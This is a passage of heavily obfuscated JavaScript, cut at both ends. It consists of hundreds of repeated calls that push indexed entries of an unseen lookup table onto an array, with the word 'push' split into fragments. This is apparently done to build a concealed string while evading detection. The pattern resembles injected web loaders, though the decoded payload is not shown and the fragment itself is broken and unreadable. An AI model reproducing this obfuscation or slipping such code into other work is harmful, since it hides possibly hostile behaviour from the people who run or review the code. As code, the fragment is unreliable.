\($[11]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[74]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[17]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[8]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[12]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[17]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[46]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[70]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[12]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[37]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[59]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[55]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[5]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[54]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[15]\);s["p"+"u"+"sh"]\($[71]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[50]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[74]\);s["p"+"u"+"sh"]\($[26]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[70]\);s["p"+"u"+"sh"]\($[71]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[26]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[74]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[46]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[46]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[70]\